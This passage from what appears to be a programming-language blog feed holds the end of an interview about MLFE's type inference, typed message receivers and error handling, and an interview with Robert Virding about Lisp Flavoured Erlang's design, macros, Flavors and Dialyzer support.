&lt;p&gt;I have to give credit (or apologize for implementing it badly?) to Oleg Kiselyov for his incredibly helpful article &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;okmij.org&#x2F;ftp&#x2F;ML&#x2F;generalization.html&quot;&gt;How OCaml type checker works&lt;&#x2F;a&gt;. I relied heavily on this, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.cis.upenn.edu&#x2F;~bcpierce&#x2F;tapl&#x2F;&quot;&gt;Types and Programming Languages&lt;&#x2F;a&gt;, and a bit on &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;tomprimozic&#x2F;type-systems&#x2F;tree&#x2F;master&#x2F;algorithm_w&quot;&gt;algorithm_w&lt;&#x2F;a&gt; for the earliest work on the typer.&lt;&#x2F;p&gt;
&lt;p&gt;It started with a very basic translation to Erlang of Oleg Kiselyov’s eager&#x2F;strict inferencer examples and then grew from there. Since the algorithm relies on unification (and hence mutation), MLFE’s inferencer needs reference cells which are currently implemented as Erlang processes. I’d like to move these to something like ETS but will probably wait until trying to rewrite and clean up the typer in MLFE itself.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Do you generate core Erlang code or Erlang code?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;The MLFE AST is translated to a Core Erlang AST using the “cerl” module and then compiled to BEAM modules from there.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;How do you type check messages?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;In MLFE a receive block types as a &lt;em&gt;receiver&lt;&#x2F;em&gt;. Receivers are polymorphic with two parameters: the kind of messages received and the result type of the contained expression. These two parameters are determined by unifying the types in the patterns and the types in the result portion of the receive’s clauses, e.g.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;receive with &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; 0 -&amp;gt; :zero&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; | x, is_integer x -&amp;gt; :not_zero&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;All of the above patterns are clearly integers and all of the result portions are atoms so the type (internally) in MLFE would be &lt;code&gt;{t_receiver, t_int, t_atom}&lt;&#x2F;code&gt;. As an aside we can of course use union types if we want more complex messages.&lt;&#x2F;p&gt;
&lt;p&gt;Unifying receivers with enclosing expressions makes &lt;em&gt;those&lt;&#x2F;em&gt; expressions receivers too so if we’re assigning a variable in a let expression, the whole thing becomes a receiver e.g.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let my_msg = receive with&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; 0 -&amp;gt; :zero&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; | x, is_integer x -&amp;gt; :not_zero &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;in [my_msg, :in_a_list, :why_not]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The above let expression is a &lt;em&gt;{t_receiver, t_int, {t_list, t_atom}}.&lt;&#x2F;em&gt; If we wrapped that in a function, the whole function is a receiver:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;foo () = let my_msg = receive with &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; 0 -&amp;gt; :zero&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; | x, is_integer x -&amp;gt; :not_zero &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;in [my_msg, :in_a_list, :why_not]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The type of the above is:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;{t_receiver, t_int, {t_arrow, [t_unit], {t_list, t_atom}}}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;That is a function from unit to a list of atoms that internally receives integer messages.&lt;&#x2F;p&gt;
&lt;p&gt;Now when we spawn a process, &lt;em&gt;spawn&lt;&#x2F;em&gt; uses the receiver’s first parameter to constrain the resulting PID to a specific type. If we spawn a function that’s a receiver of integers (resulting in a &lt;em&gt;{t_pid, t_int}&lt;&#x2F;em&gt;), all messages sent must be able to unify with &lt;em&gt;t_int&lt;&#x2F;em&gt; so if we try to send it a float or a string we get a type error at compile time.&lt;&#x2F;p&gt;
&lt;p&gt;If we spawn a function that is &lt;em&gt;not&lt;&#x2F;em&gt; a receiver, we get a &lt;em&gt;{t_pid, undefined}&lt;&#x2F;em&gt;. Since &lt;em&gt;undefined&lt;&#x2F;em&gt; will not unify with any other type, it’s a type error to send that particular process any messages at all.&lt;&#x2F;p&gt;
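&lt;p&gt;To make that concrete (treating the exact spawn and send syntax here as an illustrative sketch rather than the final surface syntax), spawning the receiver function &lt;em&gt;foo&lt;&#x2F;em&gt; from above would yield an integer-typed PID, and only integer messages would type-check against it:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pid = spawn foo []   -- foo is a receiver of integers, so pid : {t_pid, t_int}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;send 42 pid          -- fine: 42 unifies with t_int&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;send :oops pid       -- compile-time type error: t_atom does not unify with t_int&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;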
&lt;p&gt;&lt;strong&gt;One of the biggest issues I have with Erlang is that in some cases it is necessary to write code that has a lot of nested cases. Elixir added the &lt;&#x2F;strong&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;learningelixir.joekain.com&#x2F;learning-elixir-with&#x2F;&quot;&gt;&lt;strong&gt;with&lt;&#x2F;strong&gt;&lt;&#x2F;a&gt;&lt;strong&gt; special form to deal with this issue. Rust 1.13 added a new &lt;&#x2F;strong&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;blog.rust-lang.org&#x2F;2016&#x2F;11&#x2F;10&#x2F;Rust-1.13.html#the--operator&quot;&gt;&lt;strong&gt;? operator&lt;&#x2F;strong&gt;&lt;&#x2F;a&gt;&lt;strong&gt; that provides syntax sugar to deal with this issue. The RabbitMQ team created &lt;&#x2F;strong&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.rabbitmq.com&#x2F;blog&#x2F;2011&#x2F;05&#x2F;17&#x2F;can-you-hear-the-drums-erlando&#x2F;&quot;&gt;&lt;strong&gt;Erlando&lt;&#x2F;strong&gt;&lt;&#x2F;a&gt;&lt;strong&gt; using Erlang’s parse transforms (Erlang-like macros) to add syntax extensions to Erlang, with the &lt;&#x2F;strong&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;rabbitmq&#x2F;erlando#user-content-lots-of-different-types-of-monads&quot;&gt;&lt;strong&gt;do syntax&lt;&#x2F;strong&gt;&lt;&#x2F;a&gt;&lt;strong&gt; for monads being the most important one for addressing this issue. From what I have seen, the mlfe_typer.erl of MLFE also &lt;&#x2F;strong&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;j14159&#x2F;mlfe&#x2F;blob&#x2F;master&#x2F;src&#x2F;mlfe_typer.erl#L403-L427&quot;&gt;&lt;strong&gt;has this issue&lt;&#x2F;strong&gt;&lt;&#x2F;a&gt;&lt;strong&gt;.&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Do you plan on adding some construct or syntactic sugar to deal with this type of issue?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;This is certainly a common issue within MLFE’s typer itself. I don’t currently have plans to add any specific error handling sugar since I worry that doing so might push people away from OTP and supervision hierarchies. Having said that, I don’t think it’s at all unreasonable to have a simple error type and handling alternatives in a library. While try&#x2F;catch doesn’t exist yet in MLFE, it could look something like the following:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;module simple_try&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;export try_f&#x2F;1, try_map&#x2F;2&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;type t &amp;#39;result &amp;#39;error = Ok &amp;#39;result | Error &amp;#39;error&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;-- try to run f, wrapping successes in Ok and failures in Error:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;try_f f = try&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; Ok (f ())&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;catch &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; err -&amp;gt; Error err&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;-- If t is a success apply the function f to it or maintain a failed result:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;try_map t f = match t with&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; Ok result -&amp;gt; let runner () = f result in try_f runner&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; | Error e -&amp;gt; t&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;I wouldn’t call the above ideal (and we need anonymous functions to make it usable to begin with) but I think it does demonstrate that it’s relatively easy to solve the problem in a few ways without needing first-class constructs.&lt;&#x2F;p&gt;
&lt;p&gt;To be clear, I think Rust’s approach makes a great deal of sense since as far as I’m aware, its Result type is core to the language. My reluctance with doing the same in MLFE is almost entirely due to the conventions and capabilities in place with OTP that I see as beneficial in their own right.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What was the most difficult thing about implementing MLFE?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Wrapping my head around type inference and unification was definitely the most challenging thing so far. I’m still working to understand a lot of the details and I’m barely ready to dig into something like the implementation of an ML module system, especially when it comes to functors. We need parametric modules in order to type bindings to a lot of OTP so there will probably be something pretty simple and restrictive to start but I have a lot of studying and learning to do before I can be even reasonably confident we’ll still have a type system that’s decidable.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Do you have any recommendations for those of us who haven’t implemented a language yet?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Pick a problem or feature you find interesting and dive in! Start with a simple definitional interpreter to play with things first if you don’t want to learn an existing platform’s AST (Reynolds’ paper is &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;surface.syr.edu&#x2F;cgi&#x2F;viewcontent.cgi?article=1012&amp;amp;context=lcsmith_other&quot;&gt;great&lt;&#x2F;a&gt;) or just write an interpreter! If you wanted to target a particular runtime Core Erlang’s AST is generally pretty easy to get started with and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lfe&#x2F;&quot;&gt;LFE&lt;&#x2F;a&gt; is great to learn from. If you like the JVM then &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;graalvm&quot;&gt;Graal and Truffle&lt;&#x2F;a&gt; look really interesting too.&lt;&#x2F;p&gt;
&lt;p&gt;I haven’t yet taken the time to dig into SICP or &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;cs.brown.edu&#x2F;~sk&#x2F;Publications&#x2F;Books&#x2F;ProgLangs&#x2F;&quot;&gt;PLAI&lt;&#x2F;a&gt; (and I’ve heard Dr Krishnamurthi has been working on a new one) but want to at some point. I understand they’re both really good deep dives.&lt;&#x2F;p&gt;
&lt;p&gt;There are so many great ideas to check out and explore, recent work like Dr Jean Yang’s on &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;projects.csail.mit.edu&#x2F;jeeves&#x2F;&quot;&gt;Jeeves&lt;&#x2F;a&gt; for security policy enforcement; &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.cs.ubc.ca&#x2F;~rxg&#x2F;gtes.pdf&quot;&gt;gradual typing&lt;&#x2F;a&gt; — especially for effects — e.g. from Drs Banados Schwerter, Garcia, and Tanter; 1ML for a new approach to &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;people.mpi-sws.org&#x2F;~rossberg&#x2F;1ml&#x2F;&quot;&gt;first class modules&lt;&#x2F;a&gt; from Dr Andreas Rossberg and so much more we’ve barely dug into (Dr Barbara Liskov’s decades of work!).&lt;&#x2F;p&gt;
&lt;p&gt;We have mountains of great ideas from so many people and are barely scratching the surface; it’s really exciting. I’d enthusiastically recommend that anyone with any interest in programming languages pick a paper to read or an idea to research and start following where it leads. Start reading groups!&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What other languages do you recommend keeping an eye on?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Rust and Pony both look like they’re doing really interesting stuff and I’m curious as to where &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;purerl&quot;&gt;purerl&lt;&#x2F;a&gt; — an Erlang backend for PureScript — will go too. There seems to be a lot of cool stuff happening on the Scheme side of things that I keep worrying I’m missing out on.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Interview with Robert Virding, creator of Lisp Flavored Erlang, an alien technology masterpiece</title>
          <pubDate>Mon, 29 Feb 2016 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/interview-with-robert-virding-creator-lisp-flavored-erlang-an-alien-technology-masterpiece/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/interview-with-robert-virding-creator-lisp-flavored-erlang-an-alien-technology-masterpiece/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/interview-with-robert-virding-creator-lisp-flavored-erlang-an-alien-technology-masterpiece/">&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-0_N8_5MqdROjW5duRb6Dpw.png&quot; alt=&quot;&quot; &#x2F;&gt;As you might know zombies, skeletons and momies are good friends of aliens&lt;&#x2F;p&gt;
&lt;p&gt;This time I interviewed &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;twitter.com&#x2F;rvirding&quot;&gt;Robert Virding&lt;&#x2F;a&gt;, co-creator of Erlang and creator of &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;lfe.io&#x2F;&quot;&gt;Lisp Flavored Erlang&lt;&#x2F;a&gt; (LFE). I am an Erlang developer and Lisp fan — if you are learning Clojure check out my post &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;medium.com&#x2F;this-is-not-a-monad-tutorial&#x2F;how-to-earn-your-clojure-white-belt-7e7db68a71e5#.dtmcog9gk&quot;&gt;How to earn your Clojure white belt&lt;&#x2F;a&gt; — so logically I am very excited about LFE.&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;p&gt;&lt;strong&gt;Why did you create LFE?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I discovered and learnt Lisp long before we started working with Erlang, and have always loved it. But I also like the Erlang language (I don’t have problems with the syntax :-)) and how it can build systems. My goal was to make a lisp which was a “real” lisp which builds systems in the Erlang way. Hence LFE.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What is the LFE philosophy?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;LFE is a proper lisp based on the features and limitations of the Erlang VM, which coexists seamlessly with vanilla Erlang and OTP and runs on the standard Erlang VM.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;In your talk called &lt;&#x2F;strong&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.youtube.com&#x2F;watch?v=afLRmoSOnHA&quot;&gt;&lt;strong&gt;“About Language Design”&lt;&#x2F;strong&gt;&lt;&#x2F;a&gt;&lt;strong&gt; you said:&lt;br &#x2F;&gt;
&lt;em&gt;“People complain about the Erlang libraries, and one thing they complain very rightly about is that they’re inconsistent: the naming conventions are inconsistent, the argument ordering is inconsistent, everything is inconsistent about them, and that is correct. They are right and people complain about that.”&lt;&#x2F;em&gt;&lt;br &#x2F;&gt;
At some point, will you create a new standard library in LFE?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I would like to but there are some deep problems trying to do that. Basically you can’t really change any library module that is used by OTP without the effect propagating and going viral in OTP. Adding new libraries yes, modifying old modules not really. Elixir got around this by having their special module aliases, which map onto module names like ‘Elixir.XXX’, but then you end up with 2 module naming conventions. I preferred to keep the same names.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;rvirding&#x2F;lfe&#x2F;blob&#x2F;dev-macro&#x2F;src&#x2F;cl.lfe&quot;&gt;&lt;strong&gt;Common Lisp macros and functions&lt;&#x2F;strong&gt;&lt;&#x2F;a&gt;&lt;strong&gt; have been added to &lt;&#x2F;strong&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;rvirding&#x2F;lfe&#x2F;blob&#x2F;dev-macro&#x2F;src&#x2F;cl.lfe&quot;&gt;&lt;strong&gt;LFE&lt;&#x2F;strong&gt;&lt;&#x2F;a&gt;&lt;strong&gt;. &lt;&#x2F;strong&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lfex&#x2F;clj&#x2F;issues&#x2F;18&quot;&gt;&lt;strong&gt;Clojure macros and functions&lt;&#x2F;strong&gt;&lt;&#x2F;a&gt;&lt;strong&gt; are also available as a separate library. Does LFE follow more traditional Lisps like Common Lisp and Scheme, or more modern Lisps like Clojure?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;LFE has more the feel of CL and Scheme, especially CL, as it is a lisp-2 and not a lisp-1 like Scheme. Clojure is definitely interesting but I felt that the way it does concurrency doesn’t really map well onto Erlang, and the style of building systems feels different. Clojure feels more like a language with concurrency, while Erlang feels more like an operating system with a language.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What is &lt;&#x2F;strong&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;rvirding&#x2F;flavors&quot;&gt;&lt;strong&gt;LFE Flavors&lt;&#x2F;strong&gt;&lt;&#x2F;a&gt;&lt;strong&gt; and the &lt;&#x2F;strong&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;oubiwann&#x2F;los&quot;&gt;&lt;strong&gt;LFE Object System&lt;&#x2F;strong&gt;&lt;&#x2F;a&gt;&lt;strong&gt;? Aren’t they pretty similar?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Flavors is an object system on the Lisp Machine. I did LFE Flavors out of pure fun and curiosity. A long time ago (about 30 yrs) I did an implementation of Flavors for another Lisp system, Portable Standard Lisp, and I was curious to see what it would be like to do one for LFE. It worked quite well for the central parts, but there are a lot of Lisp Machine specifics which can’t be transferred. CLOS is based on Flavors and you can see the heritage.&lt;&#x2F;p&gt;
&lt;p&gt;My plan with LFE Flavors is not to bake it in as part of LFE but to have it as a supported, compatible plugin. I like to keep the core simple. I also have plans to implement more general structs, which will allow more control over data structures and access to them. They would subsume records and Elixir structs, amongst other things.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;A few months ago you&lt;&#x2F;strong&gt; &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;groups.google.com&#x2F;d&#x2F;topic&#x2F;lisp-flavoured-erlang&#x2F;l_Te7ZHkm9M&#x2F;discussion&quot;&gt;&lt;strong&gt;sent an email&lt;&#x2F;strong&gt;&lt;&#x2F;a&gt; &lt;strong&gt;titled “New macro handling and compiled macros”. How does the macro system work in LFE, what are you changing and why?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Currently macros work by defining them locally in each file where they are used. If you need to share macros then you define them in include files. The new macro handling will allow macros to be exported from modules in much the same way as functions, and you would call them in the same way. So for a module foo you call functions with (foo:function …) and macros with (foo:macro …), making the interface much more consistent and generic. Most uses of include files will disappear.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What do you think about Elixir?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Ambivalent! I don’t speak Ruby at all, so much of the syntax feels very strange and foreign. It also manages to push some of my programming buttons, for example having multiple ways of representing the same thing and adding syntax for special cases, both of which I feel are just wrong. I am jealous of their ability to clean up some of the OTP modules by writing their own interfaces and of having a way to avoid overlapping module names. I wonder about some of the complexity, but that is just because I have a thing about simplicity.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Have you incorporated any idea from it into LFE?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I have not taken any ideas directly from Elixir though we do share some features, for example having multiple modules in one file (which I am not sure I like but it can be practical).&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;I have seen&lt;&#x2F;strong&gt; &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;blog.lfe.io&#x2F;design&#x2F;2015&#x2F;07&#x2F;11&#x2F;1720-towards-multi-methods-in-lfe&#x2F;&quot;&gt;&lt;strong&gt;multimethods&lt;&#x2F;strong&gt;&lt;&#x2F;a&gt; &lt;strong&gt;and&lt;&#x2F;strong&gt; &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lfex&#x2F;los&#x2F;issues&#x2F;8&quot;&gt;&lt;strong&gt;protocols&lt;&#x2F;strong&gt;&lt;&#x2F;a&gt; &lt;strong&gt;mentioned a few times by the LFE community. What do you think about Clojure multimethods and protocols?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;One difficulty in doing something like this in Erlang is that Erlang modules must be compiled as one unit; it is impossible to add, or remove, functions afterwards without recompiling the whole module. This makes it very difficult to have methods which belong to one module defined in different places, which lessens the usefulness of multimethods. IMAO.&lt;&#x2F;p&gt;
&lt;p&gt;Flavors gets around this by compiling each component flavor separately and building an object flavor from all its mixins when the first instance is created. This allows us to create the components separately, as long as all are done before the first time they are used. After that they cannot be modified.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Do you think adding something like&lt;&#x2F;strong&gt; &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;stackoverflow.com&#x2F;questions&#x2F;26317325&#x2F;can-someone-explain-clojure-transducers-to-me-in-simple-terms&quot;&gt;&lt;strong&gt;transducers&lt;&#x2F;strong&gt;&lt;&#x2F;a&gt; &lt;strong&gt;to LFE would be a good idea?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;They probably would be, but they are not really the way I think. I find I tend to be very explicit in which data types I use; for me this is as fundamental as choosing which algorithm to use. This means that having polymorphic transformation functions becomes less interesting for me.&lt;&#x2F;p&gt;
&lt;p&gt;I know that many people prefer working in this way and I see no problems in adding them to the set of standard LFE libraries. They just won’t be integrated into LFE at the lowest level. You will be able to choose.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;I have seen some discussions about Dialyzer in LFE’s mailing list and there is a dialyzer branch in the&lt;&#x2F;strong&gt; &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;rvirding&#x2F;lfe&#x2F;tree&#x2F;dev-dialyzer&quot;&gt;&lt;strong&gt;LFE repository&lt;&#x2F;strong&gt;&lt;&#x2F;a&gt;&lt;strong&gt;. How well does LFE support&lt;&#x2F;strong&gt; &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;erlang.org&#x2F;doc&#x2F;man&#x2F;dialyzer.html&quot;&gt;&lt;strong&gt;Dialyzer&lt;&#x2F;strong&gt;&lt;&#x2F;a&gt;&lt;strong&gt;?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Supporting Dialyzer is a little tricky, as the official interface to Dialyzer is very restricted: you either pass in Erlang files, or you pass in BEAM files containing the Erlang AST of the code (compiled with the debug_info option). This does not work with LFE, as the LFE compiler generates Core Erlang, a language used internally in the compiler.&lt;&#x2F;p&gt;
&lt;p&gt;However, by being a bit cunning I have generated some alternate Dialyzer interface modules which can load in the Core Erlang forms directly. It works, but it is really only an experiment; a better solution would be to do a proper fix of the Dialyzer interface, but this is not that simple as the current interface is not very cleanly coded. It is actually quite ironic, as Dialyzer uses Core Erlang internally.&lt;&#x2F;p&gt;
